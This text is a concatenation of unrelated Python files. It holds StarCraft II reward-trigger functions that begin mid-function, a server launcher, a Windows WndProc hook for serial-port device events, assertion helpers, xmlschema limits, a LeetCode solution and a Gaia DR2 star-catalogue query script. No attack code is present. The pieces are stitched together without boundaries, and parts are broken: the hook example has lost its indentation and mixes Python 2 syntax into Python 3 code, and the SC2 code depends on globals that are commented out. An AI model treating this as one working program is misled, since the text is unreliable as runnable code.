    """Return a (n_envs, n_events) matrix of quantitative event magnitudes.

    Resource-style stats (minerals, vespene, food_used, spent_*) trigger
    +1/-1 on any change; growth-style stats trigger with the size of the
    increase; the idle-time stats trigger 1 when the counter did NOT grow.
    Returns all zeros on the first step of an episode or when it just ended.
    NOTE(review): the feature indices (minerals, food_cap, ...) are module
    globals set by make_starting_variables — the local copies are commented
    out, unlike the sibling trigger functions.
    """
    # # non_spatial_features_idx
    # # player non spatial features and indices
    # player_id = 0
    # minerals = 1
    # vespene = 2
    # food_used = 3
    # food_cap = 4
    # food_army = 5
    # food_workers = 6
    # idle_worker_count = 7
    # army_count = 8
    # warp_gate_count = 9
    # larva_count = 10
    # # score cumulative non spatial features and indices
    # score = 11
    # idle_production_time = 12
    # idle_worker_time = 13
    # total_value_units = 14
    # total_value_structures = 15
    # killed_value_units = 16
    # killed_value_structures = 17
    # collected_minerals = 18
    # collected_vespene = 19
    # collection_rate_minerals = 20
    # collection_rate_vespene = 21
    # spent_minerals = 22
    # spent_vespene = 23
    event_triggers = np.zeros([len(current_events), len(current_events[0])])
    if previous_player_layers is None or previous_score_cumulative_layers is None or done[0]:
        return event_triggers
    for env_no in range(event_triggers.shape[0]):
        for event_idx in range(event_triggers.shape[1]):
            if event_idx in [
                minerals, vespene, food_used,
                spent_minerals, spent_vespene
            ]:
                if current_events[env_no][event_idx] > previous_events[env_no][event_idx]:
                    event_triggers[env_no][event_idx] = 1
                elif current_events[env_no][event_idx] < previous_events[env_no][event_idx]:
                    event_triggers[env_no][event_idx] = -1
            elif event_idx in [
                # minerals, vespene, food_used,
                food_cap, food_workers, food_army, army_count,
                warp_gate_count, larva_count,
                score, total_value_units, total_value_structures, killed_value_units, killed_value_structures,
                collected_minerals, collected_vespene, collection_rate_minerals, collection_rate_vespene,
                # spent_minerals, spent_vespene
            ]:
                if current_events[env_no][event_idx] > previous_events[env_no][event_idx]:
                    event_triggers[env_no][event_idx] = current_events[env_no][event_idx] - \
                                                        previous_events[env_no][event_idx]
            elif event_idx in [idle_production_time, idle_worker_time]:
                if current_events[env_no][event_idx] == previous_events[env_no][event_idx]:
                    event_triggers[env_no][event_idx] = 1
            # ugly bug fix
            # (jumps larger than 20000 in one step are treated as glitches
            # in the raw stats and ignored)
            if event_idx in [
                minerals, vespene, food_used, food_cap, food_workers, food_army, army_count,
                warp_gate_count, larva_count,
                score, total_value_units, total_value_structures, killed_value_units, killed_value_structures,
                collected_minerals, collected_vespene, collection_rate_minerals, collection_rate_vespene,
                spent_minerals, spent_vespene
            ]:
                if current_events[env_no][event_idx] > previous_events[env_no][event_idx] + 20000:
                    event_triggers[env_no][event_idx] = 0
    # no production reward if supply blocked
    for env_no in range(event_triggers.shape[0]):
        if current_events[env_no][food_workers] + current_events[env_no][food_army] == current_events[env_no][food_cap] < 200 and \
                current_events[env_no][food_workers] == previous_events[env_no][food_workers] and \
                current_events[env_no][food_army] == previous_events[env_no][food_army]:
            event_triggers[env_no][idle_production_time] = 0
    return event_triggers
def getTriggeredGreedyEvents(done, previous_events, current_events, starting_values):
    """Build a per-environment reward-trigger matrix from SC2 scoreboard deltas.

    Parameters
    ----------
    done : sequence of episode-done flags; only done[0] is consulted.
    previous_events, current_events : per-env feature rows indexed by the
        constants defined below (player stats + cumulative score stats).
    starting_values : same layout; values at episode start, used as the
        baseline for "greedy" cumulative rewards.

    Returns a numpy array with one trigger value per (env, feature).
    """
    # non_spatial_features_idx
    # player non spatial features and indices
    player_id = 0
    minerals = 1
    vespene = 2
    food_used = 3
    food_cap = 4
    food_army = 5
    food_workers = 6
    idle_worker_count = 7
    army_count = 8
    warp_gate_count = 9
    larva_count = 10
    # score cumulative non spatial features and indices
    score = 11
    idle_production_time = 12
    idle_worker_time = 13
    total_value_units = 14
    total_value_structures = 15
    killed_value_units = 16
    killed_value_structures = 17
    collected_minerals = 18
    collected_vespene = 19
    collection_rate_minerals = 20
    collection_rate_vespene = 21
    spent_minerals = 22
    spent_vespene = 23
    event_triggers = np.zeros([len(current_events), len(current_events[0])])
    # NOTE(review): previous_player_layers / previous_score_cumulative_layers are
    # module-level globals, not parameters — confirm the caller keeps them in
    # sync with previous_events before trusting this guard.
    if previous_player_layers is None or previous_score_cumulative_layers is None or done[0]:
        return event_triggers
    for env_no in range(event_triggers.shape[0]):
        for event_idx in range(event_triggers.shape[1]):
            if event_idx in [
                minerals, vespene, food_used,
                food_cap, food_workers, food_army, army_count,
                warp_gate_count, larva_count,
                score, total_value_units, total_value_structures, killed_value_units, killed_value_structures,
                collected_minerals, collected_vespene,
                # collection_rate_minerals, collection_rate_vespene,
                # spent_minerals, spent_vespene
            ]:
                # greedy: reward increases relative to the episode-start value
                if current_events[env_no][event_idx] > previous_events[env_no][event_idx]:
                    event_triggers[env_no][event_idx] = current_events[env_no][event_idx] - \
                                                        starting_values[env_no][event_idx]
                # else:
                #     event_triggers[env_no][event_idx] = current_events[env_no][event_idx] - \
                #                                         previous_events[env_no][event_idx]
            elif event_idx in [collection_rate_minerals, collection_rate_vespene]:
                # rates are rewarded with their absolute current value when rising
                if current_events[env_no][event_idx] > previous_events[env_no][event_idx]:
                    event_triggers[env_no][event_idx] = current_events[env_no][event_idx]
            elif event_idx in [idle_production_time, idle_worker_time]:
                # unchanged idle counters mean "not idle this step" -> reward 1
                if current_events[env_no][event_idx] == previous_events[env_no][event_idx]:
                    event_triggers[env_no][event_idx] = 1
            # ugly bug fix
            # (presumably guards against counter resets/jumps — a step delta
            #  above 20000 is treated as bogus and the trigger is zeroed)
            if event_idx in [
                minerals, vespene, food_used, food_cap, food_workers, food_army, army_count,
                warp_gate_count, larva_count,
                score, total_value_units, total_value_structures, killed_value_units, killed_value_structures,
                collected_minerals, collected_vespene, collection_rate_minerals, collection_rate_vespene,
                spent_minerals, spent_vespene
            ]:
                if current_events[env_no][event_idx] > previous_events[env_no][event_idx] + 20000:
                    event_triggers[env_no][event_idx] = 0
    # no production reward if supply blocked
    for env_no in range(event_triggers.shape[0]):
        if current_events[env_no][food_workers] + current_events[env_no][food_army] == current_events[env_no][
            food_cap] < 200 and \
                current_events[env_no][food_workers] == previous_events[env_no][food_workers] and \
                current_events[env_no][food_army] == previous_events[env_no][food_army]:
            event_triggers[env_no][idle_production_time] = 0
    #
    # if event_idx in [score, collected_minerals, collected_vespene,
    #                  collection_rate_minerals, collection_rate_vespene,
    #                  ]:
    #     # large strictly positive rewards
    #     # to maximise
    #     if current_events[env_no][event_idx] > previous_events[env_no][event_idx]:
    #         event_triggers[env_no][event_idx] = current_events[env_no][event_idx] - \
    #                                             starting_values[env_no][event_idx]
    #
    # elif event_idx in [
    #     # minerals, vespene,
    #     spent_minerals, spent_vespene,
    #     killed_value_units, killed_value_structures]:
    #     # small rewards
    #     event_triggers[env_no][event_idx] = current_events[env_no][event_idx] - \
    #                                         previous_events[env_no][event_idx]
    #
    # elif event_idx in [food_used, food_cap, food_workers, food_army, army_count,
    #                    total_value_units, total_value_structures,
    #                    warp_gate_count, larva_count,
    #                    ]:
    #     # large positive rewards on gain
    #     # small negative rewards on loss
    #     if current_events[env_no][event_idx] > previous_events[env_no][event_idx]:
    #         event_triggers[env_no][event_idx] = current_events[env_no][event_idx] - \
    #                                             starting_values[env_no][event_idx]
    #     else:
    #         event_triggers[env_no][event_idx] = current_events[env_no][event_idx] - \
    #                                             previous_events[env_no][event_idx]
    return event_triggers
# Entry point: start the one-off misinformation-model server.
from misinfo.server_oneoff import server
# if you want to run a batch run
#from misinfo.server_batch import server
server.launch()  # NOTE(review): runs on import; consider an `if __name__ == "__main__":` guard
##########################################################################
##
## This is a modification of the original WndProcHookMixin by Kevin Moore,
## modified to use ctypes only instead of pywin32, so it can be used
## with no additional dependencies in Python 2.5
##
##########################################################################
import ctypes
from ctypes import wintypes
import wx
# Win32 constants used by the WndProc hook below.
GWL_WNDPROC = -4                         # SetWindowLong index for the window procedure
WM_DESTROY = 2
DBT_DEVTYP_PORT = 0x00000003             # device Port
DBT_DEVTYP_DEVICEINTERFACE = 0x00000005  # device interface class
DBT_DEVICEREMOVECOMPLETE = 0x8004        # device is gone
DBT_DEVICEARRIVAL = 0x8000               # system detected a new device
WM_DEVICECHANGE = 0x0219
## It's probably not neccesary to make this distinction, but it never hurts to be safe
# NOTE(review): on 64-bit Windows, GWL_WNDPROC with SetWindowLongW truncates the
# pointer — SetWindowLongPtrW and a pointer-sized WNDPROC signature would be
# required there; confirm the target is a 32-bit Python/wx build.
if 'unicode' in wx.PlatformInfo:
    SetWindowLong = ctypes.windll.user32.SetWindowLongW
    CallWindowProc = ctypes.windll.user32.CallWindowProcW
else:
    SetWindowLong = ctypes.windll.user32.SetWindowLongA
    CallWindowProc = ctypes.windll.user32.CallWindowProcA
## Create a type that will be used to cast a python callable to a c callback function
WndProcType = ctypes.WINFUNCTYPE(ctypes.c_long, ctypes.c_int, ctypes.c_uint, ctypes.c_int, ctypes.c_int)
class DEV_BROADCAST_DEVICEINTERFACE(ctypes.Structure):
    # NOTE(review): this layout (size, devicetype, reserved, name) matches the
    # Win32 DEV_BROADCAST_PORT structure, which is how it is used below for
    # DBT_DEVTYP_PORT broadcasts. The real DEV_BROADCAST_DEVICEINTERFACE also
    # has a dbcc_classguid field before the name — confirm before using this
    # type for DBT_DEVTYP_DEVICEINTERFACE notifications.
    _fields_ = [("dbcc_size", ctypes.c_ulong),
                ("dbcc_devicetype", ctypes.c_ulong),
                ("dbcc_reserved", ctypes.c_ulong),
                ("dbcc_name", ctypes.c_wchar * 256)]
class DEV_BROADCAST_HDR(ctypes.Structure):
    # Common header of every WM_DEVICECHANGE broadcast payload; the
    # dbch_devicetype field tells which concrete structure follows.
    _fields_ = [("dbch_size", wintypes.DWORD),
                ("dbch_devicetype", wintypes.DWORD),
                ("dbch_reserved", wintypes.DWORD)]
class WndProcHookMixin:
    """
    This class can be mixed in with any wxWindows window class in order to hook it's WndProc function.
    You supply a set of message handler functions with the function addMsgHandler. When the window receives that
    message, the specified handler function is invoked. If the handler explicitly returns False then the standard
    WindowProc will not be invoked with the message. You can really screw things up this way, so be careful.
    This is not the correct way to deal with standard windows messages in wxPython (i.e. button click, paint, etc)
    use the standard wxWindows method of binding events for that. This is really for capturing custom windows messages
    or windows messages that are outside of the wxWindows world.
    """

    def __init__(self):
        # message number -> handler(wParam, lParam)
        self.__msgDict = {}
        ## We need to maintain a reference to the WndProcType wrapper
        ## because ctypes doesn't — without it the callback would be
        ## garbage collected while Windows still calls into it.
        self.__localWndProcWrapped = None
        self.rtnHandles = []

    def hookWndProc(self):
        """Install localWndProc as this window's WndProc, remembering the old one."""
        self.__localWndProcWrapped = WndProcType(self.localWndProc)
        self.__oldWndProc = SetWindowLong(self.GetHandle(),
                                          GWL_WNDPROC,
                                          self.__localWndProcWrapped)

    def unhookWndProc(self):
        """Restore the original WndProc and release the ctypes wrapper."""
        SetWindowLong(self.GetHandle(),
                      GWL_WNDPROC,
                      self.__oldWndProc)
        ## Allow the ctypes wrapper to be garbage collected
        self.__localWndProcWrapped = None

    def addMsgHandler(self, messageNumber, handler):
        """Register handler(wParam, lParam) for a windows message number."""
        self.__msgDict[messageNumber] = handler

    def localWndProc(self, hWnd, msg, wParam, lParam):
        """Dispatch hooked messages, then fall through to the original WndProc."""
        # Fix: dict.has_key() was removed in Python 3; the `in` operator is the
        # idiomatic (and fastest) membership test — this runs for every single
        # windows message, so dispatch speed matters.
        if msg in self.__msgDict:
            # if the handler returns false, we terminate the message here
            # Note that we don't pass the hwnd or the message along
            # Handlers should be really, really careful about returning false here
            # (`== False` is kept deliberately: a handler returning 0 also stops
            #  the message, exactly as in the original code)
            if self.__msgDict[msg](wParam, lParam) == False:
                return
        # Restore the old WndProc on Destroy.
        if msg == WM_DESTROY:
            self.unhookWndProc()
        return CallWindowProc(self.__oldWndProc,
                              hWnd, msg, wParam, lParam)

    def hookMsgHandler(self, handlerArrival, handlerRemoved):
        """Convenience: register arrival/removal callbacks and hook WndProc."""
        self.handlerArrival = handlerArrival
        self.handlerRemoved = handlerRemoved
        self.addMsgHandler(WM_DEVICECHANGE, self.__onDeviceChange)
        self.hookWndProc()

    def __onDeviceChange(self, wParam, lParam):
        """WM_DEVICECHANGE dispatcher: forward serial-port names to the callbacks."""
        if lParam:
            dbh = DEV_BROADCAST_HDR.from_address(lParam)
            if dbh.dbch_devicetype == DBT_DEVTYP_PORT:
                # the port broadcast carries the device name right after the
                # header, which matches DEV_BROADCAST_DEVICEINTERFACE's layout
                dbd = DEV_BROADCAST_DEVICEINTERFACE.from_address(lParam)
                dbcc_name = dbd.dbcc_name
                if wParam == DBT_DEVICEARRIVAL:
                    self.handlerArrival(dbcc_name)
                elif wParam == DBT_DEVICEREMOVECOMPLETE:
                    self.handlerRemoved(dbcc_name)
        return True
'''
def registerDeviceNotification(self, guid, devicetype=DBT_DEVTYP_DEVICEINTERFACE):
devIF = DEV_BROADCAST_DEVICEINTERFACE()
devIF.dbcc_size = ctypes.sizeof(DEV_BROADCAST_DEVICEINTERFACE)
devIF.dbcc_devicetype = DBT_DEVTYP_DEVICEINTERFACE
if guid:
devIF.dbcc_classguid = comtypes.GUID(guid)
#devIF.dbcc_classguid = GUID.GUID(guid)
return RegisterDeviceNotification(self.GetHandle(), ctypes.byref(devIF), 0)
def unregisterDeviceNotification(self, handle):
if UnregisterDeviceNotification(handle) == 0:
raise Exception("Unable to unregister device notification messages")
'''
# a simple example
if __name__ == "__main__":
import _winreg
class MyPanel(wx.Panel):
def __init__(self,parent):
wx.Panel.__init__(self,parent)
COM_Label = wx.StaticText(self, -1, "COM:")
list = self.__ReadComList()
list.sort(self.sort_COM)
self.ComListBox = wx.Choice(self,choices=list)
self.ComListBox.SetStringSelection(list[0])
Box = wx.BoxSizer(wx.HORIZONTAL) # BoxSizer for Vertical ScrollBar + VSB on panel3
Box.Add(COM_Label,0)
Box.Add(self.ComListBox,0)
self.SetSizer(Box)
parent.hookMsgHandler(self.__onDeviceChange)
def sort_COM(self,COMx,COMy):
x=int(COMx.split("COM")[1])
y=int(COMy.split("COM")[1])
if x>y:
return 1
if x==y:
return 0
if x<y:
return -1
def __ReadComList(self):
key = _winreg.OpenKey( _winreg.HKEY_LOCAL_MACHINE, 'HARDWARE\DEVICEMAP\SERIALCOMM',0, _winreg.KEY_READ)
keyNb = _winreg.QueryInfoKey(key)[1]
port = []
for i in range(keyNb):
port.append(_winreg.EnumValue(key,i)[1])
_winreg.EnumValue(key,9)
return port
def __onDeviceChange(self,wParam,lParam):
#print "WM_DEVICECHANGE [WPARAM:%i][LPARAM:%i]"%(wParam,lParam)
if lParam:
dbh = DEV_BROADCAST_HDR.from_address(lParam)
if dbh.dbch_devicetype == DBT_DEVTYP_PORT:
dbd = DEV_BROADCAST_DEVICEINTERFACE.from_address(lParam)
dbcc_name = dbd.dbcc_name
if wParam == DBT_DEVICEARRIVAL:
print "COM Arrival :",dbcc_name
list = self.ComListBox.GetStrings()+[dbcc_name]
list.sort(self.sort_COM)
sav = self.ComListBox.GetStringSelection()
self.ComListBox.Clear()
for elem in list:
self.ComListBox.Append(elem)
self.ComListBox.SetStringSelection(sav)
elif wParam == DBT_DEVICEREMOVECOMPLETE:
print "COM Removed :",dbcc_name
if dbcc_name == self.ComListBox.GetStringSelection():
self.ComListBox.SetStringSelection(self.ComListBox.GetStrings()[0])
self.ComListBox.Delete(self.ComListBox.FindString(dbcc_name))
return True
class MyFrame(wx.Frame,WndProcHookMixin):
def __init__(self,parent):
WndProcHookMixin.__init__(self)
wx.Frame.__init__(self,parent,-1,"Insert and Remove USE Device and Watch STDOUT",size=(640,480))
panel = MyPanel(self)
#self.Bind(wx.EVT_CLOSE, self.onClose)
'''
def onClose(self, event):
self.unregisterDeviceNotification(self.devNotifyHandle)
event.Skip()
'''
app = wx.App(False)
frame = MyFrame(None)
frame.Show()
app.MainLoop()
|
import os
import logging
class AssertConditionConstants:
    """Whitelists of supported configuration values, checked by assertion helpers."""
    # supported dataset languages
    languages = ["eng", "kor"]
    # supported model architectures
    available_models = ["transformer", "bert", "poly-encoder", "gpt2"]
    available_optimizers = ["adam", "adam_w"]
    # how to handle over-long inputs during preprocessing
    preprocess_approaches = ["stop", "ignore", "truncate"]
    # how to aggregate token-level representations
    aggregation_methods = ["first", "last", "sum", "average"]
    decoding_methods = ["greedy", "beam_search", "top_k_sampling"]
    # supported evaluation metrics
    metrics = ["bleu", "meteor", "rouge", "hits", "semantic_score"]
class Assertion:
    """Validation helpers that log the failure and raise AssertionError.

    Every public method either returns None (check passed) or logs the
    message via logging.error and raises AssertionError with the same text.
    """

    def _fail(self, assert_message):
        """Log assert_message and raise AssertionError with it (shared failure path)."""
        logging.error(assert_message)
        raise AssertionError(assert_message)

    def assert_isinstance_list(self, data, parameter_name):
        """Require `data` to be a list."""
        if not isinstance(data, list):
            self._fail("The data type of parameter '{parameter}' must be list".format(parameter=parameter_name))

    def assert_isinstance_dict(self, data, parameter_name):
        """Require `data` to be a dict."""
        if not isinstance(data, dict):
            self._fail("The data type of parameter '{parameter}' must be dict".format(parameter=parameter_name))

    def assert_isintance(self, obj, data_type):
        """Require `obj` to be an instance of `data_type`.

        NOTE: the misspelled name is kept for backward compatibility with callers.
        """
        if not isinstance(obj, data_type):
            self._fail("The data type of parameter 'obj' must be {data_type}".format(data_type=data_type.__name__))

    def assert_isequal_dict(self, a, b):
        """Require the two dictionaries to be equal."""
        if a != b:
            self._fail("Given two dictionaries must be equal: {a} vs {b}".format(a=a, b=b))

    def assert_isequal_elements_length(self, data):
        """Require every element of `data` to have the same length (empty data passes)."""
        if not data:  # robustness: the original raised IndexError on empty input
            return
        length = len(data[0])
        for element in data:
            if len(element) != length:
                self._fail("All elements of data must have equal length: {data_length} vs {element_length}".format(
                    data_length=length, element_length=len(element)))

    def assert_contain_elements(self, required, target, name=None):
        """Require every element of `required` to be present in `target`."""
        template = "Data must contain following element: {element}"
        if name is not None:
            template = "{name} must contain following element: '{{element}}'".format(name=name)
        for element in required:
            if element not in target:
                self._fail(template.format(element=element))

    def assert_isequal_keys(self, a, b, except_keys=None):
        """Require dicts `a` and `b` to share the same keys, ignoring `except_keys`."""
        a_keys = set(a.keys())
        b_keys = set(b.keys())
        if except_keys is not None:
            a_keys = a_keys.difference(set(except_keys))
            b_keys = b_keys.difference(set(except_keys))
        if a_keys != b_keys:
            self._fail("The keys of two dictionaries must be equal: {a_keys} vs {b_keys}".format(
                a_keys=a_keys, b_keys=b_keys))

    def assert_implemented(self, method_name):
        """Unconditionally fail: `method_name` must be overridden by a subclass."""
        self._fail("{method_name} method must be implemented".format(method_name=method_name))

    def assert_equal(self, a, b):
        """Require a == b."""
        if a != b:
            self._fail("Given inputs must be equal: {a} vs {b}".format(a=a, b=b))

    def assert_equal_length(self, a, b):
        """Require len(a) == len(b)."""
        if len(a) != len(b):
            self._fail("The length of given inputs must be equal: {len1} vs {len2}".format(len1=len(a), len2=len(b)))

    def assert_equal_or_greater(self, value, criteria):
        """Require value >= criteria."""
        if value < criteria:
            self._fail("Given value must be equal or greater than {criteria}".format(criteria=criteria))

    def assert_equal_or_lesser(self, value, criteria):
        """Require value <= criteria."""
        if value > criteria:
            self._fail("Given value must be equal or lesser than {criteria}".format(criteria=criteria))

    def assert_greater_length(self, data, length):
        """Require len(data) > length."""
        if len(data) <= length:
            self._fail("The length of given data must be greater than {length}".format(length=length))

    def assert_lesser_length(self, data, length):
        """Require len(data) < length."""
        if len(data) >= length:
            self._fail("The length of given data must be lesser than {length}".format(length=length))

    def assert_is_not_none(self, obj, name=None):
        """Require obj is not None."""
        assert_message = "Object must not be None"
        if name is not None:
            assert_message = "'{name}' must not be None".format(name=name)
        if obj is None:
            self._fail(assert_message)

    def assert_not_out_of_index(self, index, upperbound):
        """Require index < upperbound."""
        if index >= upperbound:
            self._fail("Index must be less than length {upperbound}".format(upperbound=upperbound))

    def assert_isin_obj(self, element, obj):
        """Require element to be contained in obj."""
        if element not in obj:
            self._fail("Element must be one of elements of obj: {given} is not in {obj}".format(
                given=element, obj=obj))

    def assert_proper_extension(self, path, extensions):
        """Require path to end with one of the given extensions."""
        # str.endswith accepts a tuple of suffixes — one C-level call instead of a loop
        if not path.endswith(tuple(extensions)):
            self._fail("Path must ends with '{extension}': {path}".format(extension=extensions, path=path))

    def assert_is_valid_file(self, path):
        """Require path to be an existing regular file.

        Fix: the original tested `not exists(path) and not isfile(path)`, which
        let an existing directory pass as a valid "file". os.path.isfile already
        implies existence, so it is the single correct check.
        """
        if not os.path.isfile(path):
            self._fail("Invalid or File not exists: {path}".format(path=path))

    def assert_is_valid_path(self, path):
        """Require path to be an existing directory (same `and` bug fixed as above)."""
        if not os.path.isdir(path):
            self._fail("Invalid or Path not exists: {path}".format(path=path))
#
# Copyright (c), 2016-2020, SISSA (International School for Advanced Studies).
# All rights reserved.
# This file is distributed under the terms of the MIT License.
# See the file 'LICENSE' in the root directory of the present
# distribution, or http://opensource.org/licenses/MIT.
#
# @author Davide Brunato <brunato@sissa.it>
#
"""Package protection limits. Values can be changed after import to set different limits."""
MAX_XML_DEPTH = 9999
"""
Maximum depth of XML data. An `XMLSchemaValidationError` is raised if this limit is exceeded.
"""
MAX_MODEL_DEPTH = 15
"""
Maximum XSD model group depth. An `XMLSchemaModelDepthError` is raised if this limit is exceeded.
"""
|
from typing import List
class Solution:
    def numberOfSubarrays(self, nums: List[int], k: int) -> int:
        """Count subarrays of `nums` containing exactly `k` odd numbers (LeetCode 1248).

        Prefix-count technique: let s be the number of odd elements seen so far.
        A subarray ending at the current index has exactly k odds iff some
        earlier prefix had s - k odds, so accumulate occurrences per prefix
        count. O(n) time, O(n) space.
        """
        odd_prefix_count = {0: 1}  # prefix odd-count -> number of prefixes with it
        odds_so_far = 0
        result = 0
        for num in nums:  # iterate values directly instead of range(len(nums))
            if num & 1:
                odds_so_far += 1
            # dict.get replaces the original's `s - k >= 0` + `in hashmap.keys()` dance
            result += odd_prefix_count.get(odds_so_far - k, 0)
            odd_prefix_count[odds_so_far] = odd_prefix_count.get(odds_so_far, 0) + 1
        return result
import astropy.units as u
import astropy.coordinates as coord
from astroquery.gaia import Gaia
from astropy.io import ascii
import numpy as np
import pandas as pd
import math
import struct
from functools import partial
import sys
import os
from os import listdir
import warnings
warnings.filterwarnings("ignore")  # NOTE(review): silences ALL warnings globally
pd.set_option("display.max_rows", None, "display.max_columns", None)
# Query configuration. Several of these module globals (maxSelection,
# coordinateFile, parsedValuesFile, plus maxX/maxY/maxZ/maxValue/queriedStars
# below) are reassigned at runtime by main() and handleResults().
maxSelection = '100'
columns = 'source_id, ra, dec, pmra, pmdec, parallax, teff_val, radius_val, designation'
minParallax = '0.02'
maxParallax = '0.03'
parallaxOverError = '10'
coordinateFile = 'coordinates100.bin'
parsedValuesFile = 'parsedValues100000.bin'
parsecPerSlice = 2600
# Alternative ADQL query templates; only queryBase6 is used by main().
queryBase = """SELECT TOP {maxSelection}
{columns}
FROM gaiadr2.gaia_source
WHERE parallax_over_error > 10 AND
parallax > {minParallax} AND
parallax < 1000"""# AND"""
#teff_val IS NOT null
#"""
queryBase3 = """SELECT TOP {maxSelection}
{columns}
FROM gaiadr2.gaia_source
WHERE (parallax BETWEEN {minParallax} AND {maxParallax}) AND
parallax_over_error > {parallaxOverError} AND
(gaiadr2.gaia_source.radius_val>=2.0)"""# AND"""
#teff_val IS NOT null
#"""
queryBase2 = """SELECT TOP {maxSelection} {columns}
FROM gaiadr2.gaia_source
WHERE
CONTAINS(
POINT('ICRS',gaiadr2.gaia_source.ra,gaiadr2.gaia_source.dec),
CIRCLE('ICRS',266.4051,-28.936175,5)
)=1 AND (gaiadr2.gaia_source.parallax>={minParallax})"""#AND teff_val IS NOT null
#"""
queryBase4 = """SELECT *
FROM gaiadr2.gaia_source AS G, gaiadr2.vari_cepheid AS V WHERE G.source_id=V.source_id AND
parallax > 0
"""
queryBase5 = """
SELECT TOP {maxSelection}
{columns}
FROM gaiadr2.gaia_source
WHERE (gaiadr2.gaia_source.radius_val>=2.0)
"""
queryBase6 = """
SELECT {columns}
FROM gaiadr2.gaia_source
WHERE (gaiadr2.gaia_source.random_index<=1000000 AND gaiadr2.gaia_source.parallax BETWEEN 0.0384615384615385 AND 1000 AND teff_val > 0.1)
"""
# Running maxima of |x|, |y|, |z| over all processed stars (for normalization).
maxX = 0
maxY = 0
maxZ = 0
maxValue = 0
queriedStars = 0
def getTableMeta():
    """Print the gaiadr2.gaia_source table metadata followed by its column names."""
    table_meta = Gaia.load_table('gaiadr2.gaia_source')
    print(table_meta)
    for col in table_meta.columns:
        print(col.name)
def synchronousQuery():
    """Launch a small synchronous ADQL job against gaiadr2.gaia_source and print it."""
    query1 = """SELECT
    TOP 10
    source_id, ref_epoch, ra, dec, parallax
    FROM gaiadr2.gaia_source"""
    job = Gaia.launch_job(query1)
    print(job)
    job.get_results().pprint_all()
def asyncQuery():
    """Launch an asynchronous ADQL job, print its results, then delete the server-side job."""
    query2 = """SELECT TOP 3000
    source_id, ref_epoch, ra, dec, parallax
    FROM gaiadr2.gaia_source
    WHERE parallax < 1
    """
    job = Gaia.launch_job_async(query2)
    print(job)
    job.get_results().pprint_all()
    Gaia.remove_jobs([job.jobid])
def appendToFile(f, x, y, z, temper, distance, radius, source_id):
    """Append one packed star record (struct format 'fffiffq', 32 bytes) to the open file f."""
    f.write(struct.pack('fffiffq', x, y, z, temper, distance, radius, source_id))
def handleResults(f, results2):
    """Convert Gaia rows to cartesian coordinates and append them as binary records to f.

    Side effects: updates the module globals maxX/maxY/maxZ (largest absolute
    coordinate seen), maxValue and queriedStars.
    """
    count = 0
    temper = results2["teff_val"]
    print("Min K: {0} - Max K: {1}".format(min(temper),max(temper)))
    dist = coord.Distance(parallax=u.Quantity(results2["parallax"]))
    print("Min Parallax: {0} - Max Parallax: {1}".format(min(dist),max(dist)))
    print(len(results2))
    for row in results2:
        dist = coord.Distance(parallax=u.Quantity(row["parallax"] * u.mas))
        c = coord.SkyCoord(ra=row["ra"] * u.deg,
                           dec=row["dec"] * u.deg,
                           distance=dist)
        c = c.cartesian
        radius = float(row["radius_val"])
        if math.isnan(radius):
            radius = float(0)
        source_id = np.longlong(row["source_id"])
        # NOTE(review): the next three prints look like debug leftovers — they
        # write once per row; confirm before removing.
        print (c.x.value / 26000.0)
        print (c.y.value/ 26000.0)
        print (c.z.value/ 26000.0)
        x = np.single(c.x.value)
        y = np.single(c.y.value)
        z = np.single(c.z.value)
        global maxX
        global maxY
        global maxZ
        # track the largest absolute coordinate, used later for normalization
        if abs(x) > maxX:
            maxX = abs(x)
        if abs(y) > maxY:
            maxY = abs(y)
        if abs(z) > maxZ:
            maxZ = abs(z)
        temper = math.floor(row["teff_val"])
        appendToFile(f, x, y, z, temper, float(dist.value), radius, source_id)
        count = count+1
        sys.stdout.write("\rFortschritt: " + str(count) + "/" + str(maxSelection))
    global maxValue
    global queriedStars
    queriedStars = queriedStars + count
    maxValue = max(maxX, maxY, maxZ)
def parseValues(maxValue):
    """Rewrite coordinateFile into parsedValuesFile with x/y/z normalized by maxValue.

    Output layout: an int32 record count (queriedStars), then one 32-byte
    'fffiffq' record per star whose coordinates are divided by maxValue.

    Fix: the original opened the output with 'wb', closed it, and reopened it
    with 'ab' — a single 'wb' open inside `with` both truncates the file and
    guarantees the handle is closed even if parsing raises mid-way.
    """
    global queriedStars
    print(maxValue)
    record_size = struct.calcsize('fffiffq')  # 32 bytes; must match appendToFile()
    count = 0
    with open(parsedValuesFile, 'wb') as out:
        # header: number of records that follow
        out.write(struct.pack('i', np.int32(queriedStars)))
        print(coordinateFile)
        with open(coordinateFile, 'rb') as src:
            chunk = src.read(record_size)
            while chunk:
                record = struct.unpack('fffiffq', chunk)
                parsedX = np.single(record[0] / maxValue)
                parsedY = np.single(record[1] / maxValue)
                parsedZ = np.single(record[2] / maxValue)
                appendToFile(out, parsedX, parsedY, parsedZ, record[3], record[4], record[5], record[6])
                count = count + 1
                sys.stdout.write("\rFortschritt: " + str(count) + "/" + str(maxSelection))
                chunk = src.read(record_size)
def main():
    """Query Gaia DR2, write raw cartesian star records, then a normalized copy.

    Rebinds the module globals maxSelection, coordinateFile and parsedValuesFile
    based on the actual result count before writing.
    """
    #maxSelection = input("How many stars would you like to query? ")
    query6 = queryBase6.format(columns=columns)
    job2 = Gaia.launch_job_async(query6)
    results2 = job2.get_results()
    global maxSelection
    maxSelection = str(len(results2) + 1)
    print(maxSelection)
    global coordinateFile
    global parsedValuesFile
    coordinateFile = ("coordinates" + maxSelection + ".bin")
    parsedValuesFile = ("parsedValues" + maxSelection + ".bin")
    #Resets coordinateFile to an empty file
    f = open(coordinateFile, 'wb')
    f.close()
    f = open(coordinateFile, 'ab')
    # Seed record at (ra=266.4051, dec=-28.93175) deg, 8122 pc — presumably the
    # galactic center used as a reference star (cf. queryBase2); confirm.
    c = coord.SkyCoord(ra= 266.4051 * u.deg,
                       dec= -28.93175 * u.deg,
                       distance= 8122 * u.pc)
    c = c.cartesian
    x = np.single(c.x.value)
    y = np.single(c.y.value)
    z = np.single(c.z.value)
    temper = 1
    global maxX
    global maxY
    global maxZ
    if abs(x) > maxX:
        maxX = abs(x)
    if abs(y) > maxY:
        maxY = abs(y)
    if abs(z) > maxZ:
        maxZ = abs(z)
    appendToFile(f, x, y, z, temper, 8122, 1, np.longlong(1))
    global queriedStars
    queriedStars = queriedStars + 1
    handleResults(f, results2)
    f.close()
    filename = 'gdr2_testResults.txt'
    results2.write(filename, format='ascii',overwrite=True)
    print("")
    Gaia.remove_jobs([job2.jobid])
    print("Starting to parse values")
    parseValues(maxValue)
    print("")
    print("Parsed Values")
"""
PARSER
--------------------
